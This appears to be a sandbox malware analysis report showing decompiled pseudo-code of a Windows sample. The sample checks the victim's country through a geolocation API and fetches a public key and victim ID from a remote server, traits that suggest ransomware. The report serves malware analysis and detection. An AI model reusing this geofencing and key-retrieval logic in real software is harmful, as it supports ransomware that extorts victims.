				E00415C10(_t128,  &_v112, _t149, _t152, L"https://api.2ip.ua/geo.json");
				_v8 = 0;
				_t94 =  >=  ? _v112 :  &_v112;
				_t95 = InternetOpenUrlW(_t149,  >=  ? _v112 :  &_v112, 0, 0, 0, 0); // executed
				_t153 = _t95;
				if(_t153 != 0) {
					InternetReadFile(_t153,  &_v10396, 0x2800,  &_v156); // executed
					InternetCloseHandle(_t153);
					InternetCloseHandle(_t149);
					_push(0x10);
					_v44 = 0xf;
					_v48 = 0;
					_v64 = 0;
					E004156D0(_t128,  &_v64, _t149, "\"country_code\":\"");
					_v8 = 1;
					_v20 = 0xf;
					_v24 = 0;
					_v40 = 0;
					if(_v10396 != 0) {
						_t134 =  &_v10396;
						_t23 = _t134 + 1; // 0x1
						_t146 = _t23;
						do {
							_t102 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t102 != 0);
						_t135 = _t134 - _t146;
					} else {
						_t135 = 0;
					}
					_push(_t135);
					E004156D0(_t128,  &_v40, _t149,  &_v10396);
					_v8 = 2;
					_t106 =  >=  ? _v64 :  &_v64;
					if(E00414300( &_v40,  >=  ? _v64 :  &_v64, 0, _v48) == 0xffffffff) {
						L30:
						_t129 = 0;
					} else {
						_t156 = E00413010( &_v40,  &_v136, _t107 + _v48, 0xa);
						if( &_v40 != _t114) {
							if(_v20 >= 0x10) {
								L00422587(_v40);
								_t161 = _t161 + 4;
							}
							_v20 = 0xf;
							_v24 = 0;
							_v40 = 0;
							E00413D40( &_v40, _t156);
						}
						if(_v116 >= 0x10) {
							L00422587(_v136);
							_t161 = _t161 + 4;
						}
						if(E00414300( &_v40, "\"", 0, 1) == 0xffffffff) {
							goto L30;
						} else {
							E00413010( &_v40,  &_v88, 0, _t116);
							_t131 = _v72;
							_t151 = 0;
							_v152 = "RU";
							_v148 = "BY";
							_v144 = "UA";
							_v140 = "AZ";
							_v136 = "AM";
							_v132 = "TJ";
							_v128 = "KZ";
							_v124 = "KG";
							_v120 = "UZ";
							_v116 = "SY";
							do {
								_t147 =  *((intOrPtr*)(_t159 + _t151 * 4 - 0x94));
								if( *_t147 != 0) {
									_t157 = _t147;
									_t61 = _t157 + 1; // 0x500005
									_t142 = _t61;
									do {
										_t119 =  *_t157;
										_t157 = _t157 + 1;
									} while (_t119 != 0);
									_t158 = _t157 - _t142;
								} else {
									_t158 = 0;
								}
								_t144 =  >=  ? _v88 :  &_v88;
								_t121 =  <  ? _t131 : _t158;
								_t122 = E0040B650( >=  ? _v88 :  &_v88, _t147,  <  ? _t131 : _t158);
								_t161 = _t161 + 4;
								if(_t122 != 0 || _t131 < _t158 || (_t122 & 0xffffff00 | _t131 != _t158) != 0) {
									goto L24;
								} else {
									_t129 = 1;
								}
								L26:
								if(_v68 >= 0x10) {
									L00422587(_v88);
									_t161 = _t161 + 4;
								}
								_v68 = 0xf;
								_v72 = 0;
								_v88 = 0;
								goto L31;
								L24:
								_t151 = _t151 + 1;
							} while (_t151 < 9);
							_t129 = 0;
							goto L26;
						}
					}
					L31:
					if(_v20 >= 0x10) {
						L00422587(_v40);
						_t161 = _t161 + 4;
					}
					_v20 = 0xf;
					_v24 = 0;
					_v40 = 0;
					if(_v44 >= 0x10) {
						L00422587(_v64);
						_t161 = _t161 + 4;
					}
					_v44 = 0xf;
					_v48 = 0;
					_v64 = 0;
				} else {
					_t129 = 0;
				}
				if(_v92 >= 8) {
					L00422587(_v112);
				}
				 *[fs:0x0] = _v16;
				return _t129;
			}

0x0040cf19
0x0040cf1b
0x0040cf20
0x0040cf26
0x0040cf2d
0x0040cf32
0x0040cf33
0x0040cf40
0x0040cf4a
0x0040cf4f
0x0040cf5f
0x0040cf65
0x0040cf67
0x0040cf6e
0x0040cf72
0x0040cf81
0x0040cf85
0x0040cf8e
0x0040cf9e
0x0040cfa6
0x0040cfac
0x0040cfb0
0x0040cfcd
0x0040cfda
0x0040cfdd
0x0040cfdf
0x0040cfe9
0x0040cff0
0x0040cff7
0x0040cffb
0x0040d000
0x0040d00b
0x0040d012
0x0040d019
0x0040d01d
0x0040d023
0x0040d029
0x0040d029
0x0040d030
0x0040d030
0x0040d032
0x0040d033
0x0040d037
0x0040d01f
0x0040d01f
0x0040d01f
0x0040d039
0x0040d044
0x0040d049
0x0040d05c
0x0040d069
0x0040d1cb
0x0040d1cb
0x0040d06f
0x0040d084
0x0040d08b
0x0040d091
0x0040d096
0x0040d09b
0x0040d09b
0x0040d0a2
0x0040d0a9
0x0040d0b0
0x0040d0b4
0x0040d0b4
0x0040d0bd
0x0040d0c5
0x0040d0ca
0x0040d0ca
0x0040d0e1
0x00000000
0x0040d0e7
0x0040d0f1
0x0040d0f6
0x0040d0f9
0x0040d0fb
0x0040d105
0x0040d10f
0x0040d119
0x0040d123
0x0040d12d
0x0040d134
0x0040d13b
0x0040d142
0x0040d149
0x0040d150
0x0040d150
0x0040d15a
0x0040d160
0x0040d162
0x0040d162
0x0040d165
0x0040d165
0x0040d167
0x0040d168
0x0040d16c
0x0040d15c
0x0040d15c
0x0040d15c
0x0040d177
0x0040d17d
0x0040d181
0x0040d186
0x0040d18b
0x00000000
0x0040d1c7
0x0040d1c7
0x0040d1c7
0x0040d1a2
0x0040d1a6
0x0040d1ab
0x0040d1b0
0x0040d1b0
0x0040d1b3
0x0040d1ba
0x0040d1c1
0x00000000
0x0040d19a
0x0040d19a
0x0040d19b
0x0040d1a0
0x00000000
0x0040d1a0
0x0040d0e1
0x0040d1cd
0x0040d1d1
0x0040d1d6
0x0040d1db
0x0040d1db
0x0040d1e2
0x0040d1e9
0x0040d1f0
0x0040d1f4
0x0040d1f9
0x0040d1fe
0x0040d1fe
0x0040d201
0x0040d208
0x0040d20f
0x0040cfb2
0x0040cfb2
0x0040cfb2
0x0040d217
0x0040d21c
0x0040d221
0x0040d22b
0x0040d236

APIs

_memset.LIBCMT ref: 0040CF4A
InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
InternetCloseHandle.WININET(00000000), ref: 0040CFDA
InternetCloseHandle.WININET(00000000), ref: 0040CFDD

Strings

Microsoft Internet Explorer, xrefs: 0040CF5A
https://api.2ip.ua/geo.json, xrefs: 0040CF79
"country_code":", xrefs: 0040CFE1

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead_memset
String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
API String ID: 1485416377-2962370585
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00427B0B(int _a4) {
				void* _t4;

				_t1 =  &_a4; // 0x423b69
				E00427AD7(_t4,  *_t1);
				ExitProcess(_a4);
			}

0x00427b0e
0x00427b11
0x00427b1a

APIs

___crtCorExitProcess.LIBCMT ref: 00427B11

Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8

ExitProcess.KERNEL32 ref: 00427B1A

Strings

i;B, xrefs: 00427B0E

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID: i;B
API String ID: 2427264223-472376889
Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00427F3D(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00427E0E(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x00427f40
0x00427f42
0x00427f44
0x00427f47
0x00427f50

APIs

_doexit.LIBCMT ref: 00427F47

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode__initterm$__lock_doexit
String ID:
API String ID: 3712619029-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041E690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696
stringnetworkfileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E0041E690(void* __ecx, intOrPtr __edx, char _a4, char _a8, char _a16, char _a256, char _a264, char _a268, char _a272, void _a296, char _a360, char _a361, char _a1292, char _a1296, short _a2368, signed int _a22780, char _a22800, intOrPtr _a22804, int _a22812, char _a22856, intOrPtr _a22880) {
				short _v0;
				char _v4;
				short _v8;
				char _v12;
				char _v14;
				char _v15;
				char _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				WCHAR* _v36;
				char _v40;
				char _v44;
				char _v45;
				WCHAR* _v48;
				char _v52;
				char _v54;
				intOrPtr _v57;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				long _v76;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				WCHAR* _v100;
				char _v101;
				intOrPtr _v103;
				signed int _v104;
				intOrPtr _v107;
				signed int _v108;
				intOrPtr _v109;
				char _v111;
				char _v122;
				intOrPtr _v134;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t219;
				signed int _t223;
				void* _t227;
				void* _t241;
				signed int _t250;
				signed int _t251;
				WCHAR* _t254;
				signed int _t265;
				int _t266;
				signed int _t274;
				signed int _t275;
				WCHAR* _t278;
				signed int _t288;
				signed int _t291;
				signed int _t294;
				WCHAR* _t298;
				WCHAR* _t303;
				signed int _t313;
				signed int _t318;
				int _t321;
				signed int _t322;
				int _t329;
				char* _t330;
				signed int _t336;
				WCHAR* _t346;
				signed int _t361;
				char _t367;
				void* _t368;
				WCHAR* _t369;
				WCHAR* _t373;
				WCHAR* _t374;
				signed int _t375;
				char _t377;
				signed int* _t381;
				signed int _t382;
				signed int _t383;
				char* _t386;
				intOrPtr* _t389;
				signed int _t390;
				intOrPtr* _t397;
				signed int _t398;
				intOrPtr* _t403;
				signed int _t404;
				intOrPtr* _t407;
				signed int _t408;
				char* _t410;
				char* _t412;
				short* _t415;
				signed int* _t418;
				char* _t419;
				char* _t421;
				intOrPtr* _t423;
				intOrPtr* _t425;
				void* _t429;
				char _t430;
				void* _t431;
				WCHAR* _t432;
				void* _t433;
				WCHAR* _t434;
				char _t435;
				void* _t439;
				unsigned int _t440;
				signed int _t442;
				void* _t443;
				unsigned int _t444;
				signed int _t447;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				void* _t454;
				void* _t455;
				void* _t456;
				char* _t457;
				char* _t458;
				void* _t459;
				char* _t462;
				void* _t463;
				void* _t465;
				void* _t466;
				char* _t467;
				void* _t468;
				char* _t469;
				void* _t470;
				short* _t472;

				_t417 = __edx;
				_t453 = _t452 & 0xfffffff8;
				_push(0xffffffff);
				_push(0x4cb3ec);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t453;
				_push(__ecx);
				E0042F7C0(0x597c);
				_t367 = _a4;
				_push(_t437);
				 *((char*)(_t367 + 4)) = 1;
				E00423F74(timeGetTime());
				_t454 = _t453 + 4;
				_v14 = E0040C6A0();
				_v8 = 4;
				while(1) {
					_t429 = lstrlenA;
					do {
						do {
							while(1) {
								L2:
								_a360 = 0;
								E0042B420( &_a361, 0, 0x3ff);
								_t455 = _t454 + 0xc;
								_v15 = 0;
								if(E0040C500( &_a360, _t417) == 0) {
									goto L4;
								} else {
									_v15 = 1;
								}
								L35:
								_v100 = 0;
								_t437 = 0;
								_t241 = E00423CF0( &_a272, "{\"public_key\":\"");
								_t454 = _t455 + 8;
								if(_t241 != 0) {
									lstrcpyA( &_a1296, _t454 + lstrlenA("{\"public_key\":\"") + 0x188);
									lstrcpyA( &_a272,  &_a1296);
									_t250 = lstrlenA( &_a272);
									__eflags = _t250;
									if(_t250 <= 0) {
										L45:
										_t458 = _t454 - 0x18;
										_v101 = 0;
										_t419 = _t458;
										 *(_t419 + 0x14) = 0xf;
										 *(_t419 + 0x10) = 0;
										 *_t419 = 0;
										__eflags = _a272;
										if(_a272 != 0) {
											_t389 =  &_a272;
											_t97 = _t389 + 1; // 0x1
											_t439 = _t97;
											do {
												_t251 =  *_t389;
												_t389 = _t389 + 1;
												__eflags = _t251;
											} while (_t251 != 0);
											_t390 = _t389 - _t439;
											__eflags = _t390;
											L50:
											_push(_t390);
											E004156D0(_t367, _t419, _t429,  &_a272);
											_t420 = _v109;
											_t254 = E00412900( &_v72, _v109);
											_t459 = _t458 + 0x18;
											__eflags = _t254[0xa] - 8;
											if(_t254[0xa] >= 8) {
												_t254 =  *_t254;
											}
											_t369 = _t367 + 0x7550;
											lstrcpyW(_t369, _t254);
											__eflags = _v48 - 8;
											if(_v48 >= 8) {
												L00422587(_v68);
												_t459 = _t459 + 4;
											}
											_t440 = 2 + lstrlenA( &_a268) * 2;
											_t432 = E00420C62(_t369, _t420, _t429, _t440);
											E0042B420(_t432, 0, _t440);
											_t437 = _t440 >> 1;
											MultiByteToWideChar(0, 0,  &_a268, 0xffffffff, _t432, _t440 >> 1);
											lstrcpyW(_t369, _t432);
											_t417 = 0;
											 *((short*)(_a4 + 0x7550 + _v104 * 2)) = 0;
											_t265 = E00423CF0( &_a268, "\",\"id\":\"");
											_t454 = _t459 + 0x18;
											__eflags = _t265;
											if(_t265 != 0) {
												_t266 = lstrlenW(_t369);
												_t433 = lstrlenA;
												lstrcpyA( &_a1292,  &(( &(( &_a268)[lstrlenA("\",\"id\":\"")]))[_t266]));
												lstrcpyA( &_a268,  &_a1292);
												_v104 = 0;
												_t442 = 0;
												_t274 = lstrlenA( &_a268);
												__eflags = _t274;
												if(_t274 <= 0) {
													L64:
													_t462 = _t454 - 0x18;
													_t421 = _t462;
													 *(_t421 + 0x14) = 0xf;
													 *(_t421 + 0x10) = 0;
													 *_t421 = 0;
													__eflags = _a268;
													if(_a268 != 0) {
														_t397 =  &_a268;
														_t443 = _t397 + 1;
														do {
															_t275 =  *_t397;
															_t397 = _t397 + 1;
															__eflags = _t275;
														} while (_t275 != 0);
														_t398 = _t397 - _t443;
														__eflags = _t398;
														L69:
														_push(_t398);
														E004156D0(0, _t421, _t433,  &_a268);
														_t417 = 0;
														_t278 = E00412900( &_v76, 0);
														_t463 = _t462 + 0x18;
														__eflags = _t278[0xa] - 8;
														if(_t278[0xa] >= 8) {
															_t278 =  *_t278;
														}
														_t373 = _a4 + 0xea80;
														lstrcpyW(_t373, _t278);
														__eflags = _v52 - 8;
														if(_v52 >= 8) {
															L00422587(_v72);
															_t463 = _t463 + 4;
														}
														_t444 = 2 + lstrlenA( &_a264) * 2;
														_t434 = E00420C62(_t373, _t417, _t433, _t444);
														E0042B420(_t434, 0, _t444);
														_t454 = _t463 + 0x10;
														MultiByteToWideChar(0, 0,  &_a264, 0xffffffff, _t434, _t444 >> 1);
														lstrcpyW(_t373, _t434);
														_t435 = _a4;
														_t437 = _t435 + 0x7550;
														 *((short*)(_t435 + 0xea80 + _v108 * 2)) = 0;
														_t288 = lstrlenW(_t437);
														__eflags = _t288;
														if(_t288 <= 0) {
															L75:
															__eflags = _v111;
															if(_v111 == 0) {
																__eflags = _t437;
																if(_t437 != 0) {
																	E00420BED(_t437);
																	_t454 = _t454 + 4;
																}
																__eflags = _t373;
																if(_t373 != 0) {
																	E00420BED(_t373);
																	_t454 = _t454 + 4;
																}
																goto L82;
															}
															goto L76;
														} else {
															_t318 = lstrlenW(_t373);
															__eflags = _t318;
															if(_t318 != 0) {
																 *((char*)(_t435 + 4)) = 0;
																goto L112;
															}
															goto L75;
														}
													}
													_t398 = 0;
													goto L69;
												}
												while(1) {
													__eflags =  *((char*)(_t454 + _t442 + 0x188)) - 0x22;
													if( *((char*)(_t454 + _t442 + 0x188)) == 0x22) {
														break;
													}
													_t442 = _t442 + 1;
													_t321 = lstrlenA( &_a268);
													__eflags = _t442 - _t321;
													if(_t442 < _t321) {
														continue;
													}
													goto L64;
												}
												_v104 = _t442;
												goto L64;
											} else {
												__eflags = _v107 - _t265;
												if(_v107 == _t265) {
													L82:
													E00411B10();
													_t437 = _v104 - 1;
													_v104 = _t437;
													__eflags = _t437;
													if(__eflags <= 0) {
														E0040EF50(0x510020,  &_v104, __eflags, 0x10);
														_t465 = _t454 + 4;
														_v4 = 0xf;
														_v8 = 0;
														_v24 = 0;
														_a22804 = 2;
														_t447 = 0;
														__eflags = 0;
														_t374 = _v104;
														do {
															_t423 =  *((intOrPtr*)(_t374 + _t447 * 4));
															__eflags =  *_t423;
															if( *_t423 != 0) {
																_t403 = _t423;
																_t435 = _t403 + 1;
																do {
																	_t291 =  *_t403;
																	_t403 = _t403 + 1;
																	__eflags = _t291;
																} while (_t291 != 0);
																_t404 = _t403 - _t435;
																__eflags = _t404;
																goto L91;
															}
															_t404 = 0;
															L91:
															_push(_t404);
															E00413EA0(_t374,  &_v24, _t435, _t447, _t423);
															_t447 = _t447 + 1;
															__eflags = _t447 - 0x10;
														} while (__eflags < 0);
														E0040EF50(0x510060,  &_v108, __eflags, 0x10);
														_t466 = _t465 + 4;
														_v32 = 0xf;
														_v36 = 0;
														_v52 = 0;
														_a22800 = 3;
														_t448 = 0;
														__eflags = 0;
														_t375 = _v108;
														do {
															_t425 =  *((intOrPtr*)(_t375 + _t448 * 4));
															__eflags =  *_t425;
															if( *_t425 != 0) {
																_t407 = _t425;
																_t435 = _t407 + 1;
																do {
																	_t294 =  *_t407;
																	_t407 = _t407 + 1;
																	__eflags = _t294;
																} while (_t294 != 0);
																_t408 = _t407 - _t435;
																__eflags = _t408;
																goto L98;
															}
															_t408 = 0;
															L98:
															_push(_t408);
															E00413EA0(_t375,  &_v52, _t435, _t448, _t425);
															_t448 = _t448 + 1;
															__eflags = _t448 - 0x10;
														} while (_t448 < 0x10);
														_t467 = _t466 - 0x18;
														_t410 = _t467;
														_push(0xffffffff);
														 *(_t410 + 0x14) = 0xf;
														 *(_t410 + 0x10) = 0;
														 *_t410 = 0;
														E00413FF0(0, _t410,  &_v32, 0);
														_t298 = E00412900( &_v92, 0);
														_t468 = _t467 + 0x18;
														__eflags = _t298[0xa] - 8;
														if(_t298[0xa] >= 8) {
															_t298 =  *_t298;
														}
														_t377 = _a4;
														lstrcpyW(_t377 + 0x7550, _t298);
														__eflags = _v64 - 8;
														if(_v64 >= 8) {
															L00422587(_v84);
															_t468 = _t468 + 4;
														}
														_t469 = _t468 - 0x18;
														_v122 = 0;
														_t412 = _t469;
														_push(0xffffffff);
														 *(_t412 + 0x14) = 0xf;
														 *(_t412 + 0x10) = 0;
														 *_t412 = 0;
														E00413FF0(_t377, _t412,  &_v60, 0);
														_t303 = E00412900( &_v96, _v134);
														_t470 = _t469 + 0x18;
														__eflags = _t303[0xa] - 8;
														if(_t303[0xa] >= 8) {
															_t303 =  *_t303;
														}
														lstrcpyW(_t377 + 0xea80, _t303);
														__eflags = _v68 - 8;
														if(_v68 >= 8) {
															L00422587(_v88);
															_t470 = _t470 + 4;
														}
														__eflags = _v44 - 0x10;
														 *((char*)(_t377 + 0x15fb7)) = 1;
														if(_v44 >= 0x10) {
															L00422587(_v64);
															_t470 = _t470 + 4;
														}
														__eflags = _v20 - 0x10;
														_v44 = 0xf;
														_v48 = 0;
														_v64 = 0;
														if(_v20 >= 0x10) {
															L00422587(_v40);
														}
														 *((char*)(_t377 + 4)) = 0;
														L112:
														__eflags = 0;
														 *[fs:0x0] = _a22780;
														return 0;
													}
													_t367 = _a4;
													while(1) {
														_t429 = lstrlenA;
														L2:
														_a360 = 0;
														E0042B420( &_a361, 0, 0x3ff);
														_t455 = _t454 + 0xc;
														_v15 = 0;
														if(E0040C500( &_a360, _t417) == 0) {
															goto L4;
														} else {
															_v15 = 1;
														}
													}
												}
												break;
											}
										}
										_t390 = 0;
										goto L50;
									}
									while(1) {
										__eflags =  *((char*)(_t454 +  &(_t437[0xc4]))) - 0x22;
										if( *((char*)(_t454 +  &(_t437[0xc4]))) == 0x22) {
											break;
										}
										_t437 =  &(_t437[0]);
										_t329 = lstrlenA( &_a272);
										__eflags = _t437 - _t329;
										if(_t437 < _t329) {
											continue;
										}
										goto L45;
									}
									_v100 = _t437;
									goto L45;
								}
								if(_v103 == _t241) {
									goto L82;
								}
								_t330 =  &_a8;
								__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t330);
								if(_t330 >= 0) {
									PathAppendA( &_v12, "bowsakkdestx.txt");
									DeleteFileA( &_v16);
								}
								continue;
								L4:
								_v12 = 0;
								_t368 = InternetOpenW(L"Microsoft Internet Explorer", 0, 0, 0, 0);
								_v0 = 7;
								_v4 = 0;
								_v20 = 0;
								_t430 = _a4;
								_t418 = _t430 + 0x20;
								_a22880 = 0;
								__eflags =  *_t418;
								if( *_t418 != 0) {
									_t381 = _t418;
									_t437 =  &(_t381[0]);
									goto L7;
									L7:
									_t219 =  *_t381;
									_t381 =  &(_t381[0]);
									__eflags = _t219;
									if(_t219 != 0) {
										goto L7;
									} else {
										_t382 = _t381 - _t437;
										__eflags = _t382;
										_t383 = _t382 >> 1;
										goto L9;
									}
								} else {
									_t383 = 0;
									L9:
									_push(_t383);
									E00415AE0(_t368,  &_v20, _t430, _t437, _t418);
									__eflags = _v8 - 8;
									_push(L".bit/");
									_t222 =  >=  ? _v28 :  &_v28;
									_push( >=  ? _v28 :  &_v28);
									_t223 = E00421C02( &_v20);
									_t456 = _t455 + 8;
									__eflags = _t223;
									if(_t223 != 0) {
										_t472 = _t456 - 0x18;
										_t415 = _t472;
										_push(0xffffffff);
										 *(_t415 + 0x14) = 7;
										 *(_t415 + 0x10) = 0;
										 *_t415 = 0;
										E00414690(_t368, _t415,  &_v24, 0);
										_t437 = E0040DD40( &_v12);
										_t456 = _t472 + 0x18;
										__eflags =  &_v36 - _t437;
										if( &_v36 != _t437) {
											_v8 = 7;
											_v12 = 0;
											_v28 = 0;
											__eflags = _t437[0xa] - 8;
											if(_t437[0xa] >= 8) {
												_v28 =  *_t437;
												 *_t437 = 0;
											} else {
												_t361 = _t437[8] + 1;
												__eflags = _t361;
												if(_t361 != 0) {
													E004205A0( &_v28, _t437, _t361 + _t361);
													_t456 = _t456 + 0xc;
												}
											}
											_v12 = _t437[8];
											_v8 = _t437[0xa];
											__eflags = 0;
											_t437[0xa] = 7;
											_t437[8] = 0;
											 *_t437 = 0;
										}
										__eflags = _a16 - 8;
										if(_a16 >= 8) {
											L00422587(_v4);
											_t456 = _t456 + 4;
										}
									}
									_push(5);
									E00415AE0(_t368,  &_v24, _t430, _t437, L"?pid=");
									_t457 = _t456 - 0x18;
									_v45 = 0;
									_t386 = _t457;
									_push(0xffffffff);
									 *(_t386 + 0x14) = 0xf;
									 *(_t386 + 0x10) = 0;
									 *_t386 = 0;
									E00413FF0(_t368, _t386, _t430 + 8, 0);
									_t417 = _v57;
									_t227 = E00412900( &_v20, _v57);
									_t455 = _t457 + 0x18;
									_push(0xffffffff);
									_push(0);
									_a22856 = 1;
									L004159D0(_t368,  &_v44, _t430, _t437, _t227);
									__eflags = _v12 - 8;
									if(_v12 >= 8) {
										L00422587(_v16);
										_t455 = _t455 + 4;
									}
									__eflags = _v20 - 8;
									_t230 =  >=  ? _v40 :  &_v40;
									lstrcpyW( &_a2368,  >=  ? _v40 :  &_v40);
									__eflags =  *((char*)(_t430 + 0x15fb5));
									if( *((char*)(_t430 + 0x15fb5)) == 0) {
										__eflags =  *((char*)(_t430 + 0x15fb6));
										if( *((char*)(_t430 + 0x15fb6)) == 0) {
											__eflags = _v54;
											_t346 =  &_a2368;
											if(_v54 == 0) {
												_push(L"&first=false");
											} else {
												_push(L"&first=true");
											}
											lstrcatW(_t346, ??);
										}
									}
									_t431 = InternetOpenUrlW(_t368,  &_a2368, 0, 0, 0, 0);
									InternetReadFile(_t431,  &_a296, 0x400,  &_v76);
									__eflags = _v92;
									if(_v92 > 0) {
										_t336 =  &_a16;
										__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t336);
										__eflags = _t336;
										if(_t336 >= 0) {
											PathAppendA( &_v4, "bowsakkdestx.txt");
											_t451 = E004220B6( &_v8, "w");
											_t455 = _t455 + 8;
											__eflags = _t451;
											if(__eflags != 0) {
												_push(_t451);
												_push(lstrlenA( &_a256));
												_push(1);
												_push( &_a256);
												E00422B02(_t368, _t417, _t431, _t451, __eflags);
												_push(_t451);
												E00423A38(_t368, _t431, _t451, __eflags);
												_t455 = _t455 + 0x14;
											}
										}
									}
									InternetCloseHandle(_t431);
									InternetCloseHandle(_t368);
									_a22812 = 0xffffffff;
									__eflags = _v68 - 8;
									if(_v68 >= 8) {
										L00422587(_v88);
										_t455 = _t455 + 4;
									}
									_t367 = _a4;
									_t429 = lstrlenA;
									goto L35;
								}
							}
							_t322 =  &_a4;
							__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t322);
							_t429 = lstrlenA;
							_t367 = _a4;
							__eflags = _t322;
						} while (_t322 < 0);
						PathAppendA( &_v16, "bowsakkdestx.txt");
						DeleteFileA( &_v20);
						while(1) {
							_t429 = lstrlenA;
							goto L2;
						}
						L76:
						_t313 =  &_v0;
						__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t313);
						_t429 = lstrlenA;
						_t367 = _a4;
						__eflags = _t313;
					} while (_t313 < 0);
					PathAppendA( &_v20, "bowsakkdestx.txt");
					DeleteFileA( &_v24);
				}
			}

0x0041e690
0x0041e693
0x0041e696
0x0041e698
0x0041e6a3
0x0041e6a4
0x0041e6ab
0x0041e6b1
0x0041e6b7
